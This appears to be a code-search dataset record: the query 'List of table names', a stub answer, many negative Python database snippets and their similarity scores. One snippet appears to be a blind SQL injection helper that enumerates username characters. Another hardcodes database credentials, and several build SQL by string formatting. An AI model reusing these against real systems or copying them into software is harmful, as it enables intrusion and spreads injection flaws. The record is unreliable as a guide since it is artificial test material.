self.get_databases()\n all_dbs = []\n for data in all_data:\n all_dbs.append(data[\"system:resource_name\"][\"@value\"])\n return all_dbs", "def get_db_name(self):\n\t\treturn conf.db_name", "def get_list_of_names():\n conn = r.connect(host=HOST, port=PORT, db=DB)\n names = r.table(FINGERPRINT_TABLE)[\"name\"].run(conn)\n return list(names)", "def check_name_db ():\n db_checks = [DB_FIRST_MALE, DB_FIRST_FEMALE,\n DB_LAST_SIMPLE, DB_LAST_NAMESON,\n DB_LAST_GAELIC1, DB_LAST_GAELIC2,\n DB_LAST_COMBO1, DB_LAST_COMBO2,\n DB_LAST_UPPER1, DB_LAST_UPPER2]\n\n db_exists = db.database_exists\n for db_name in db_checks:\n if not db_exists(db_name):\n raise DatabaseException, db_name", "def product_db() -> List[Text]:\n\n return [\n \"credit\",\n \"forex\",\n \"debit\",\n \"atm\"\n ]", "def id_chooser(query, ident):\n\n return [\"db1\", \"db2\"]", "def names():\n\n # Use Pandas to perform the sql query\n stmt = db.session.query(metadata).statement\n df = pd.read_sql_query(stmt, db.session.bind)\n\n # Return a list of the column names (sample names)\n return jsonify(list(df[\"ID\"]))", "def get_cryptomatte_names(self):\n return [self.cryptomattes[x][\"name\"] for x in self.cryptomattes]", "def _get_random_name(database, prefix='', length=5):\n if isinstance(database, OracleDatabase):\n name = '{}{}'.format(prefix.upper(), get_random_string(string.ascii_uppercase))\n else:\n name = '{}{}'.format(prefix.lower(), get_random_string(string.ascii_lowercase))\n\n return name", "def get_db_name(account=None, species=None, db_type=None, release=None,\n division=None, DEBUG=False):\n if account is None:\n account = get_ensembl_account(release=release)\n \n if DEBUG:\n print \"Connection To:\", account\n print \"Selecting For:\", species, db_type, release\n \n server = DbConnection(account, db_name='PARENT')\n cursor = server.cursor()\n show = \"SHOW DATABASES\"\n if species or db_type or release:\n pattern = make_db_name_pattern(species, db_type, release)\n show = \"%s LIKE %s\" % (show, pattern)\n if DEBUG:\n print show\n cursor.execute(show)\n rows = cursor.fetchall()\n dbs = []\n for row in rows:\n try:\n if division is not None and division not in row[0]:\n continue\n name = EnsemblDbName(row[0])\n if (release is None or name.Release == str(release)) and\\\n (db_type is None or name.Type == db_type):\n dbs.append(name)\n except (IndexError, RuntimeError):\n if DEBUG:\n print \"FAIL:\", row[0]\n continue\n return dbs", "def test_db_map(self):\r\n\r\n\r\n db_map = WildDBNames._db_map\r\n self.assertEquals(db_map['words_and_whatnot'], 'content')\r\n self.assertEquals(db_map['integers_etc'], 'numbers')", "def stores(self):\n sql = u\"SELECT name FROM `sqlite_master` WHERE type='table'\"\n rows = self.conn.execute(sql)\n return [r['name'] for r in rows\n if r['name'] not in self.invalid_names]", "def dbName(self, code) -> str:\n return f'{code}{self.name}'", "def _db_uri_parts():\n return app.config['SQLALCHEMY_DATABASE_URI'].split('/')", "def get_db_name_by_mode(mode: int) -> str:\n if mode == TAIWANESE_MODE:\n return 'taiwanese.db'\n pass\n elif mode == CHINESE_MODE:\n return 'chinese.db'\n pass\n elif mode == CHINESE_POPULAR_MODE:\n return 'chinesepop.db'\n pass\n else:\n raise Exception(\"invalid mode\")\n pass", "def get_cites_species():\n mongo_db = mongo_client_db()\n cursor = mongo_db[CITES_COLLECTION].find({'full_name': {'$ne': None}}, {'full_name':1})\n return [r['full_name'].encode('utf8') for r in cursor]", "def uniprot_pdbs(self, species=None):\n\n uniprot_accessions = [\n link.accession() for link in self.database_links(species=species)\n if link.database() == \"UniProtKB\"\n ]\n if uniprot_accessions:\n results = pdb.query_rcsb_advanced(\"UpAccessionIdQuery\", {\n \"accessionIdList\": \",\".join(uniprot_accessions)\n })\n return [result.split(\":\")[0] for result in results] if results else []\n else:\n return []", "def namelist(self):\n return self._handle.namelist()", "def namelist(self):\n return self._handle.namelist()", "def get_aliases_string(trembl_list):\n aliases_list = []\n\n for row in trembl_list:\n psimi_trembl = \"trembl:\" + row[1]\n aliases_list.append(psimi_trembl)\n\n return \"|\".join(aliases_list)", "def get_table_column_name(self, table):\n c = self.conn.cursor()\n c.execute(\"SELECT * FROM %s\" % table)\n names = list(map(lambda x: x[0], c.description))\n return names", "def figure_names(self) -> List[str]:\n return self._db_data.figure_names", "def get_name(self) -> str:\n return self.dbname", "def names(cls) -> List[str]:", "def list_dbs(self):\n return self.get('_all_dbs').json()", "def _get_random_schema_name(database, prefix='', length=5):\n prefix = f'C##{prefix}' if isinstance(database, OracleDatabase) else prefix\n return _get_random_name(database, prefix=prefix, length=length)", "def list_databases():\n config = load_config()\n\n databases = [x for x in config.keys() if \"schemas\" in config[x]]\n return databases", "def getNames(self) -> List[unicode]:\n ...", "def get_names(view, sel):\n word = view.word(sel)\n schema = None\n if view.substr(word.begin() - 1) == '.':\n schema = view.substr(view.word(word.begin() - 2)).lower()\n return schema, view.substr(word).lower()", "def database_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"database_name\")", "def databases(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"databases\")", "def names():\n pass", "def names(self):\n return [da.name for da in self]", "def nameList(self):\r\n return [self.name.lower(), self.code] + self._otherNames", "def get_colnames(self):\n\n cd = self.conn.execute('select * from atom')\n print('Possible column names are:')\n names = list(map(lambda x: x[0], cd.description))\n print('\\trowID')\n for n in names:\n print('\\t'+n)", "def get_databases ():\n return _dbobjects[:]", "def keys(self):\n if self.db == None:\n raise AssertionError(\"DB not open\")\n\n self.lock.acquire()\n try:\n usernames = list(self.db.keys())\n finally:\n self.lock.release()\n usernames = [u for u in usernames if not u.startswith(\"--Reserved--\")]\n return usernames", "def charname(self):\n return self._charname", "def selectnamesD(data):\n col = []\n for name in list(data):\n if name.startswith('hyperactive_'):\n col.append(name)\n else:\n col = col\n \n return col", "def dname(namelength = 15):\n\tresult = \"\"\n\tfor x in range(namelength):\n\t\tresult += random.choice(\"0123456789\")\n\treturn result", "def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):\n \"\"\"\nsqlzoo characters\n['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']\n\"\"\"\n lst = []\n\n for ch in special:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n for ch in lower:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n for ch in numbers:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n for ch in other:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n if(caseSensitive):\n for ch in upper:\n if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = \"\", index = \"no index\")):\n lst.append(ch)\n if(wildCards):\n for ch in wildcards:\n lst.append(ch) #it'll match if there's users\n return lst", "def _list():\n db = shelve.open(\"db\", flag='c', protocol=None, writeback=False)\n names_only = input(\"Names only [Y/n] ->\")\n\n if names_only == \"Y\":\n for name in db.keys():\n print(name)\n elif names_only == \"n\":\n for key in db.items():\n print(key, sep=' ', end='\\n', file=sys.stdout, flush=False)\n #print((\";\\n\".join(\"%s=>%s\" % i for i in db.items())))", "def namelist():\n\n\n session = Session(engine)\n\n results = session.query(lockdown.country).order_by(lockdown.country).all()\n\n #session.close()\n all_symbols = list(np.ravel(results))\n sym = all_symbols[1]\n\n return jsonify(all_symbols)", "def keys(self):\r\n if self.db == None:\r\n raise AssertionError(\"DB not open\")\r\n\r\n self.lock.acquire()\r\n try:\r\n usernames = self.db.keys()\r\n finally:\r\n self.lock.release()\r\n usernames = [u for u in usernames if not u.startswith(\"--Reserved--\")]\r\n return usernames", "def get_feature_names(self):\n return [self.char]", "def db_name():\n\n headers = {\n 'accept': 'text/plain',\n }\n\n try:\n response = requests.get('https://reactome.org/AnalysisService/database/name', headers=headers)\n except ConnectionError as e:\n print(e)\n\n if response.status_code == 200:\n return response.text\n else:\n print('Status code returned a value of %s' % response.status_code)", "def fulldbname(self):\n return 'myfls_'+self.user.username+'_'+self.dbname", "def get_db_schema_text(db_name: str) -> str:\n\n return str(subprocess.check_output(['sqlite3', db_name, '.schema']), 'utf-8')", "def getDatabaseName(self):\n return self._base.getDatabaseName()", "def keys(self):\n tuples = self._execute(\"SELECT name FROM users\")\n ret = [tup[0] for tup in tuples]\n return ret", "def select_categories_database(self):\n # connection to the database\n self.cursor = self.data_base.cursor(MySQLCursorPrepared)\n self.cursor.execute(\"USE Purbeurre\")\n self.cursor.execute(\"SELECT id, categories FROM Category ORDER BY id\")\n id_name_categories = self.cursor.fetchall()\n id_name_categories = self.new_orm.transform_categories_to_object(id_name_categories)\n return id_name_categories", "def show_dbs(*dbs):\n if dbs:\n log.debug(\"get dbs from pillar: %s\", dbs)\n result = {}\n for db in dbs:\n result[db] = __salt__[\"pillar.get\"](\"oracle:dbs:\" + db)\n return result\n else:\n pillar_dbs = __salt__[\"pillar.get\"](\"oracle:dbs\")\n log.debug(\"get all (%s) dbs from pillar\", len(pillar_dbs))\n return pillar_dbs", "def keys(self):\n query = \"\"\"SELECT column_name, data_type, character_maximum_length\n FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'ngc2236';\"\"\"\n result = self.wifsip.query(query)\n keys = [r[0] for r in result]\n return keys", "def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"databases\")", "def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"databases\")", "def listAll(self):\n red = self.dbConnect()\n return red.keys()", "def safe_column_name(string):\n string = unidecode(string.replace(' ', '_').lower())\n return re.sub(r'[^0-9a-z_]','', string)", "def test_db_map(self):\r\n class WildDBNames(Model):\r\n id = columns.UUID(primary_key=True, default=lambda:uuid4())\r\n content = columns.Text(db_field='words_and_whatnot')\r\n numbers = columns.Integer(db_field='integers_etc')\r\n\r\n db_map = WildDBNames._db_map\r\n self.assertEquals(db_map['words_and_whatnot'], 'content')\r\n self.assertEquals(db_map['integers_etc'], 'numbers')", "def __get_db_args(self, db_name):\n db_args = {}\n if db_name == 'local':\n db_args['host'] = '2SHT10DXY4OQ4VQ\\XUANDB'\n db_args['db'] = 'xuan_test_db'\n db_args['user'] = 'sa'\n db_args['passwd'] = 'pgjdcwn040506'\n elif db_name == 'tj':\n db_args['host'] = 'JDFYHISBAK\\ZJRMYY'\n db_args['db'] = 'medical'\n db_args['user'] = 'zjrmyy'\n db_args['passwd'] = 'zjrmyy'\n else:\n pass\n return (db_args['host'], db_args['db'], db_args['user'], db_args['passwd'])", "def get_table_names() -> Iterable[str]:\n for pipeline_name in get_pipeline_names():\n yield pipeline_name.replace(\"_\", \"-\")", "def db_lookup(client):\n dblist_dict= client.get_list_database()\n # print(\"def db_lookup 010:\", dblist_dict)\n # print(\"def db_lookup 020:\", dblist_dict[3]['name'])\n # for element in dblist_dict:\n # print(\"db_lookup 3:\", element['name'])\n return dblist_dict" ]
[ "0.6628727", "0.5976508", "0.5936507", "0.5901102", "0.58635503", "0.5853042", "0.5845213", "0.58389676", "0.58144695", "0.58012706", "0.5732453", "0.5721888", "0.5696421", "0.5669424", "0.56576335", "0.5632975", "0.56264454", "0.56206435", "0.5605173", "0.5598442", "0.5570138", "0.5568779", "0.5564397", "0.55643475", "0.5546304", "0.55416715", "0.5533799", "0.5532949", "0.55016935", "0.5472257", "0.54721606", "0.546409", "0.5446846", "0.5426624", "0.54265606", "0.5418519", "0.5405785", "0.53998715", "0.53767335", "0.5357409", "0.5340311", "0.5332472", "0.5328472", "0.53257513", "0.5314009", "0.53063625", "0.5305111", "0.52927715", "0.52830154", "0.52773863", "0.52749914", "0.5263588", "0.5261024", "0.5260947", "0.5255695", "0.52379256", "0.5235746", "0.5235746", "0.5233493", "0.523109", "0.5228316", "0.5225265", "0.5218831", "0.5216476", "0.52103895", "0.5209971", "0.5188926", "0.5187718", "0.5187118", "0.5182425", "0.5176918", "0.51743275", "0.5174239", "0.517074", "0.5159381", "0.5153062", "0.5151695", "0.51445043", "0.51426965", "0.513974", "0.5131712", "0.5124141", "0.5123185", "0.5119129", "0.5118877", "0.51163614", "0.5106409", "0.51019007", "0.50997573", "0.50930625", "0.5091404", "0.50912994", "0.50810707", "0.50810707", "0.50789523", "0.5071953", "0.50657696", "0.5064646", "0.5060855", "0.50554436" ]
0.7128734
0
List of table names
def makeTableNamesList(n, ):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTableNames(self):\n\n # The specific command depends on whether we are using mysql or sqlite\n if self.connector == 'mysql':\n sqlcmd = (\"SELECT table_name FROM INFORMATION_SCHEMA.TABLES \" +\n \"WHERE table_schema='\" + self.dbname + \"'\")\n else:\n sqlcmd = \"SELECT name FROM sqlite_master WHERE type='table'\"\n\n self._c.execute(sqlcmd)\n tbnames = [el[0] for el in self._c.fetchall()]\n\n return tbnames", "def getTables(self):\n\treturn self.dbNames", "async def tables(self) -> List[bytes]:\n names = await self.client.getTableNames()\n\n # Filter using prefix, and strip prefix from names\n if self.table_prefix is not None:\n prefix = self._table_name(b'')\n offset = len(prefix)\n names = [n[offset:] for n in names if n.startswith(prefix)]\n\n return names", "def get_table_names(self):\n return self.engine.table_names()", "def list_tables(self, context=\"MYDB\"):\n q = 'SELECT Distinct TABLE_NAME FROM information_schema.TABLES'\n res = self.quick(q, context=context, task_name='listtables', system=True)\n # the first line is a header and the last is always empty\n # also, the table names have \" as the first and last characters\n return list(res[\"TABLE_NAME\"])", "def tables(self) -> list:\n return self.list_tables()", "def table_names(self, cursor=None):\r\n return [kind.key().name() for kind in Query(kind='__kind__').Run()]", "def list_tables(self):\n return LIST_TABLES(db=self.db)", "def list_tables(self) -> List[str]:\n return self.dynamodb_client.list_tables()[\"TableNames\"]", "def show_tables(self) -> List[str]:\n return list(self.tb.keys())", "def getTableNames(self):\n\tif not self.dbNames:\n\t # get db table names from DB\n\t if self.dbType==\"sqlite\":\n\t query=\"SELECT name FROM sqlite_master WHERE type='table';\"\n\t elif self.dbType==\"mysql\":\n\t query=\"SHOW TABLES\"\n\t self.startTxn(\"SQLUtil.__init__\")\n\t tup=self.fetchAll(query)\n\t self.endTxn(\"SQLUtil.__init__\")\n\t for item in tup:\n\t self.dbNames.append(item[0])\n\treturn self.dbNames", "def tables(self):\n result = self.execute(self.commands.get_tables(self.name))\n return [x[0] for x in result]", "def get_table_list(self):\n # the \\\"{{}}\\\" is where the sql command will be added via a second `.format()`\n container_command = \"docker exec {} sh -c \\\"{{}}\\\"\".format(self.mysql_container)\n sql_command = \"mysql {} --execute='SHOW TABLES FROM {};'\".format(self.mysql_credentials, self.database_name)\n table_list = self.shell(container_command.format(sql_command))\n table_list = table_list.split(\"\\n\")\n assert table_list[0] == \"Tables_in_{}\".format(self.database_name)\n return table_list[1:]", "def get_table_names(self,verbose=False):\n \n assert(self.connected)\n \n \n GET_TABLE_NAMES_COMMAND = \"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = '{0}'\".format(self.config['database'])\n \n self.cursor.execute(GET_TABLE_NAMES_COMMAND)\n \n tables = []\n for row in self.cursor:\n tables.append(row[0])\n \n return tables", "def show_tables(self):\n query = \"SELECT name FROM sqlite_master WHERE type = 'table'\"\n try:\n temp = self.__cur.execute(query)\n except Exception as e:\n self.__conn.rollback()\n raise e\n\n tables = []\n for x in temp:\n tables.append(x[\"name\"])\n del temp\n return tables", "def get_tables(self, db_name):\n pass", "def Fetch_All_Table_Names(self, d_params=None):\n ctx = self.__Connect_To_Snowflake(d_params)\n all_tables = ctx.cursor().execute(\"show tables\")\n ctx.close()\n return [x[1] for x in all_tables]", "def tables(self):\n if self.table is None:\n raise GiraffeError(\"Target table has not been set.\")\n return [\n \"{}_wt\".format(self.table),\n \"{}_log\".format(self.table),\n \"{}_e1\".format(self.table),\n \"{}_e2\".format(self.table),\n ]", "def get_tables(self):\n\t\tbuild = 'SELECT * FROM pg_catalog.pg_tables WHERE schemaname != \\'pg_catalog\\' AND schemaname != \\'information_schema\\';'\n\t\tself.cur.execute(build)\n\t\ttotal = self.cur.fetchall()\n\t\ttable_list = []\n\t\tfor a in total:\n\t\t\ttable_list.append(a[1])\n\t\treturn table_list", "def meta_db_tables(self) -> list:\r\n def _passer(**kwargs):\r\n data = self.engine.execute(\"\"\"\r\n SELECT * FROM sqlite_master WHERE type='table';\r\n \"\"\").fetchall()\r\n table_names = [i[1] for i in data]\r\n return table_names\r\n return self._connectionController(_passer)", "def get_tables(self):\n return list(self._metadata['tables'].keys())", "def query_tables(self):\n # Find all tables\n tables_q = \"SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE \\'sqlite_%\\';\"\n tables = self.query(tables_q)\n # print(tables)\n return tables", "def get_table_names(conn, schema, prefix='', suffix=''):\n query = f\"select table_name from information_schema.tables where table_schema = '{schema}'\"\n table_names = pd.read_sql(query, con=get_connection()).to_numpy(copy=True).flatten()\n table_names = [t for t in table_names if t.startswith(prefix) and t.endswith(suffix)]\n return table_names", "def table_name() -> str:\n pass", "def list_tables(self, **kwargs):\n cursor = self.execute(\n self.list_tables_sql, dict({\"database\": self.uri.database}, **kwargs)\n )\n return [row[0] for row in cursor.fetchall()]", "async def test_tornado_list_tables(self):\n\n tables = self.r.table_list().run(self.conn)\n assert isinstance(tables, list)", "def get_tables_from_db(self):\r\n self.cursor.execute(\"SELECT name FROM sqlite_master WHERE type = 'table';\")\r\n\r\n # Return list of tuples with the names of tables --> names of profiles.\r\n self.profiles_name_list = [elem[0] for elem in self.cursor.fetchall()]\r\n self.profiles_name_list = tuple(self.profiles_name_list)", "def listOSWTables(conn):\n conn_cursor = conn.cursor()\n conn.text_factory = str\n res = conn.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables=[name[0] for name in res]\n return tables", "def show_tables(db_name):\n output = execute_sql(db_name, \"SELECT name FROM sqlite_master WHERE type='table';\")\n return output", "def getTAPTables(self):\n\t\treturn [r[\"tablename\"] for r in\n\t\t\tself.readerConnection.queryToDicts(\n\t\t\t\t\"select tablename from dc.tablemeta where adql\")]", "def show_tables(self, name_db):\n conn, cursor = SQLDatabase.connect()\n try:\n cursor.execute(\"SHOW TABLES FROM {}\".format(name_db))\n self.all_tables = [table[0] for table in cursor.fetchall()]\n except mysql.connector.errors.ProgrammingError as err:\n print(\"{} : {} --> unknown\".format(err, name_db))\n finally:\n SQLDatabase.close(cursor, conn)\n\n return self.all_tables", "def get_tables():\n return execute(\"SELECT name FROM sqlite_master WHERE type = 'table';\")", "def print_all_tables(self):\n conn = self.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n print(cursor.fetchall())", "def list_tables(database):\n config = load_config()\n tables = [x for x in config[database]['schemas']]\n\n return tables", "def get_tables(conn):\n cur = conn.cursor()\n cur.execute(\"\"\"SELECT name FROM sqlite_master\n WHERE type='table' AND name NOT LIKE 'sqlite_%';\n \"\"\")\n tables = cur.fetchall()\n\n return tables", "def get_table_list(self, cursor):\n\n cursor.execute(\n \"\"\"\n SELECT c.relname, c.relkind\n FROM pg_catalog.pg_class c\n LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace\n WHERE c.relkind IN ('r', 'v', '')\n AND n.nspname = '%s'\n AND pg_catalog.pg_table_is_visible(c.oid)\"\"\"\n % get_current_schema().schema_name\n )\n\n return [\n TableInfo(row[0], {\"r\": \"t\", \"v\": \"v\"}.get(row[1]))\n for row in cursor.fetchall()\n if row[0] not in self.ignored_tables\n ]", "def list_tables(self, repo):\n return sorted(self.user_con.list_tables(repo=repo))", "def collect_table_names(self):\n try:\n for migrate_table in self.migration_tables:\n tabel_name = migrate_table.migrationTable.DestinationTable.name\n self.table_list.add(tabel_name)\n self.tables.update(self.table_list)\n except Exception as err:\n logger.error(\"collect_table_names [error] -> %s\" % err)", "def tables(self):\n return Table.objects.filter(schema__database=self)", "def list_tables(**db_kwargs) -> List[str]:\n try:\n client = boto3.client(\"dynamodb\", **db_kwargs)\n return sorted(client.list_tables()[\"TableNames\"], reverse=True)\n except Exception as err: # pylint:disable=broad-except\n raise RuntimeError(\"Failed to fetch the table list: %s\" % str(err))", "def get_tables(self):\n r = self.client.query(\"show tables\")\n if r:\n tables = [tuple(reversed(x.split(','))) for x in filter(None, r.split('\\n'))][1:]\n FT.table_cache = dict(tables)\n return tables\n else:\n logging.error(\"get_tables: no response\")", "def get_table_list(self, tables):\n statmt = \"SELECT tablename FROM pg_catalog.pg_tables where tablename not like 'pg_%' and tablename not like 'sql_%'\"\n self.cur.execute(statmt)\n rows = [table[0] for table in list(self.cur.fetchall())]\n\n if len(tables) != 0:\n rows = list(map(str, set(rows).intersection(tables)))\n return rows", "def tables_dict(self):\n return self.tables.table_name_map", "def get_tables(self):\n return self._get_types_from_default_ns(Table)", "def getTableByName(self, tablename):\n pass", "def get_table_names() -> Iterable[str]:\n for pipeline_name in get_pipeline_names():\n yield pipeline_name.replace(\"_\", \"-\")", "def get_tables(self, *, only_names=True, verbose=False):\n\n tables = self._tap.load_tables(only_names=only_names,\n include_shared_tables=False,\n verbose=verbose)\n if only_names is True:\n table_names = []\n for t in tables:\n table_names.append(t.name)\n return table_names\n else:\n return tables", "def getTableNames(self, lsstLevel, dbName):\n return self._doRequest(self.httpClient.getTableNames, lsstLevel, dbName)", "def showTables(database: str) -> list:\n\n bd = _database(database)\n\n if bd:\n\n temp = []\n\n for tabla in bd[\"tablas\"]:\n temp.append(tabla[\"nombre\"])\n\n return temp\n\n else:\n return None", "def _get_tables(self) -> pd.DataFrame:\n return self.server._execute_extract(\n \"SELECT tablename FROM pg_catalog.pg_tables WHERE schemaname = '{}'\".format(\n self.name\n )\n )", "def get_table_list(cursor):\n # Skip the sqlite_sequence system table used for autoincrement key\n # generation.\n cursor.execute(\"\"\"\n SELECT name FROM sqlite_master\n WHERE type='table' AND NOT name='sqlite_sequence'\n ORDER BY name\"\"\")\n return [row[0] for row in cursor.fetchall()]", "def tablename(self):\n _, tail = os.path.split(self.url)\n return tail[:-4]", "def __getListTables(self):\n\n listTables = \"{\\\\*\\\\listtable\\n\"\n overrideTables = \"{\\\\listoverridetable\\n\"\n for listDef in self.lists:\n id = listDef.id\n listTables += listDef.getRtf()\n overrideTables += (\"{\\\\listoverride\\\\listid%d\"\n \"\\\\listoverridecount0\\\\ls%d}\\n\" % (id, id))\n return listTables + \"}\\n\" + overrideTables + \"}\\n\"", "def tables(cls):\n if not hasattr(cls, '_tables'):\n cls.parse_attributes()\n return cls._tables", "def list_tables(service):\n r = _post(service)\n if 'tables' in r:\n return [table(p) for p in r['tables']]\n return None", "def show_tables(self):\n try:\n c = self.conn\n cur = c.cursor()\n sql = (\"SHOW TABLES;\")\n cur.execute(sql)\n return cur.fetchall()\n except sqlc.Error as e:\n print (\"MySQL exception #{0}: {1}\".format(e.errno, e.msg))\n return None\n except Exception as e:\n msg = \"\"\n for arg in e.args:\n msg = msg + arg + \"\\n\"\n print (\"Couldn't get list of tables: {0}\".format(msg))\n return None", "def getAllName(table):\n\ttry:\n\t\tcon = sqlite3.connect('PampDb.db')\n\t\tcur = con.cursor()\n\t\tcur.execute(\"SELECT * FROM \" + table)\n\t\tnames = cur.fetchall()\n\t\tcon.commit()\n\t\tcon.close()\n\t\treturn names\n\texcept:\n\t\tprint('Could not run function getAllName from DbController')", "def list_tables(option, opt, value, parser):\n print \"CCP Data Dump Table List\"\n print \"------------------------\"\n for table in util.IMPORT_LIST:\n print \"%s\" % table.__name__.replace('Importer_', '')\n print \"-- %d tables --\" % len(util.IMPORT_LIST)\n # The -l argument is just used for listing, proceed no further.\n exit_with_succ()", "def table_name(self) -> str:\n return \"OLTP\"", "def table_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"table_name\")", "def tableName():\n return \"people\"", "def _notifications_lists_tblname(self):\n return 'notifications_lists'", "def list_tables(jwt_payload: dict, schema_name: str):\n DJConnector.set_datajoint_config(jwt_payload)\n\n # Get list of tables names\\\n tables_name = dj.schema(schema_name).list_tables()\n\n # Dict to store list of table name for each type\n tables_dict_list = dict(manual_tables=[], lookup_tables=[], computed_tables=[],\n imported_tables=[], part_tables=[])\n\n # Loop through each table name to figure out what type it is and add them to\n # tables_dict_list\n for table_name in tables_name:\n table_type = dj.diagram._get_tier(\n '`' + schema_name + '`.`' + table_name + '`').__name__\n print(table_name, table_type, flush=True)\n if table_type == 'Manual':\n tables_dict_list['manual_tables'].append(dj.utils.to_camel_case(table_name))\n elif table_type == 'Lookup':\n tables_dict_list['lookup_tables'].append(dj.utils.to_camel_case(table_name))\n elif table_type == 'Computed':\n tables_dict_list['computed_tables'].append(dj.utils.to_camel_case(table_name))\n elif table_type == 'Imported':\n tables_dict_list['imported_tables'].append(dj.utils.to_camel_case(table_name))\n elif table_type == 'Part':\n table_name_parts = table_name.split('__')\n tables_dict_list['part_tables'].append(DJConnector.snake_to_camel_case(\n table_name_parts[-2]) + '.' + DJConnector.snake_to_camel_case(\n table_name_parts[-1]))\n else:\n print(table_name + ' is of unknown table type')\n\n return tables_dict_list", "def stores(self):\n sql = u\"SELECT name FROM `sqlite_master` WHERE type='table'\"\n rows = self.conn.execute(sql)\n return [r['name'] for r in rows\n if r['name'] not in self.invalid_names]", "def tables(self):\n cursor = self.connection.cursor()\n\n # not returning an iterator: just fetch everything.\n # I'm guessing this will be fine for any realistic database\n # size, and avoids issues of having multiple open cursors\n # at the same time.\n cursor.execute('SHOW TABLES')\n table_names = []\n for result_data in cursor:\n for table_name in result_data.values():\n table_names.append(table_name)\n\n definitions = OrderedDict()\n for table_name in table_names:\n cursor.execute('SHOW CREATE TABLE %s' % table_name)\n if not cursor.rowcount:\n raise ValueError(\"Failed to execute SHOW CREATE TABLE command on table %s\" % table_name)\n\n result_data = cursor.fetchone()\n definitions[table_name] = result_data['Create Table']\n\n cursor.close()\n\n return definitions", "def showTables():\n global cursor\n #cursor.execute('SELECT * FROM *')\n cursor.execute('''SELECT * FROM sqlite_master WHERE type='table' ''')\n\n tables = cursor.fetchall()\n print \"Tables available are:\"\n print tables[0]", "def print_tables(self):\n print \"------------------\\nTables\\n------------------\"\n cnt = 0\n for x in self.show_tables():\n cnt += 1\n print (\"{0}.) {1}\".format(cnt, x[0]))", "def tablename(klass):\n if not hasattr(klass, 'TABLENAME'):\n inf = Inflector()\n klass.TABLENAME = inf.tableize(klass.__name__)\n return klass.TABLENAME", "def get_table_column_name(self, table):\n c = self.conn.cursor()\n c.execute(\"SELECT * FROM %s\" % table)\n names = list(map(lambda x: x[0], c.description))\n return names", "def tables(self):\n return self.properties.get('tables',\n WorkbookTableCollection(self.context, ResourcePath(\"tables\", self.resource_path)))", "def get_tables(self, *, only_names=True, verbose=False, cache=True):\n\n if cache and self._cached_tables is not None:\n tables = self._cached_tables\n else:\n tables = self._tap.load_tables(only_names=only_names, include_shared_tables=False, verbose=verbose)\n self._cached_tables = tables\n if only_names:\n return [t.name for t in tables]\n else:\n return tables", "def get_table_name(self):\n return self._table", "def _exceptions_lists_tblname(self):\n return 'exceptions_lists'", "def get_tables_name_and_type(self) -> Optional[Iterable[Tuple[str, str]]]:\n try:\n schema_name = self.context.database_schema.name.__root__\n if self.source_config.includeTables:\n for table_and_type in self.query_table_names_and_types(schema_name):\n table_name = self.standardize_table_name(\n schema_name, table_and_type.name\n )\n table_fqn = fqn.build(\n self.metadata,\n entity_type=Table,\n service_name=self.context.database_service.name.__root__,\n database_name=self.context.database.name.__root__,\n schema_name=self.context.database_schema.name.__root__,\n table_name=table_name,\n skip_es_search=True,\n )\n if filter_by_table(\n self.source_config.tableFilterPattern,\n table_fqn\n if self.source_config.useFqnForFiltering\n else table_name,\n ):\n self.status.filter(\n table_fqn,\n \"Table Filtered Out\",\n )\n continue\n yield table_name, table_and_type.type_\n\n if self.source_config.includeViews:\n for view_name in self.inspector.get_view_names(schema_name):\n view_name = self.standardize_table_name(schema_name, view_name)\n view_fqn = fqn.build(\n self.metadata,\n entity_type=Table,\n service_name=self.context.database_service.name.__root__,\n database_name=self.context.database.name.__root__,\n schema_name=self.context.database_schema.name.__root__,\n table_name=view_name,\n )\n\n if filter_by_table(\n self.source_config.tableFilterPattern,\n view_fqn\n if self.source_config.useFqnForFiltering\n else view_name,\n ):\n self.status.filter(\n view_fqn,\n \"Table Filtered Out\",\n )\n continue\n yield view_name, TableType.View\n except Exception as err:\n logger.warning(\n f\"Fetching tables names failed for schema {schema_name} due to - {err}\"\n )\n logger.debug(traceback.format_exc())", "def tablename(entity) -> str:\n return entity.__tablename__", "def getTableKeys(self, tableName):\n sql = \"SHOW COLUMNS FROM %s\" % tableName\n resultSet = []\n try:\n results = self.selectOpt(sql)\n for r in results:\n resultSet.append(r['Field'])\n except:\n print(\"[ERROR] Table '%s' does not exist.\" % tableName)\n return resultSet", "def test_defined_table_names(model):\n required_tables = {\"user\", \"service\", \"role\", \"permission\", \"instance\"}\n\n defined_tables = []\n for model in defined_models:\n defined_tables.append(model.__tablename__)\n\n assert len(required_tables.difference(defined_tables)) == 0", "def table(self):\n return self._table_name", "def list_tables(dataset_name, project=None):\n bigquery_client = bigquery.Client(project=project)\n dataset = bigquery_client.dataset(dataset_name)\n\n if not dataset.exists():\n print('Dataset {} does not exist.'.format(dataset_name))\n return\n\n for table in dataset.list_tables():\n print(table.name)", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def table_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"table_name\")", "def table_name(self) -> pulumi.Input[str]:\n return 